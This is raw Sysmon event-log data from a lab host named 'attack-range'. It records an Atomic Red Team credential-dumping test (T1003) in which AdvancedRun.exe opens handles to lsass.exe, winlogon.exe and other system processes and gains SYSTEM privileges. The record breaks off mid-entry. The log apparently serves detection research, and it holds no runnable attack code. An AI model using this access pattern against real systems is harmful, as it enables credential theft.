17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953112Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953110Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953109Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953108Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953107Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953106Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003953105Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003953104Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003953103Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953102Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953101Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003953100Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003953099Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953098Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953097Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953096Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953095Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED58-61EA-7D03-000000002702}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTE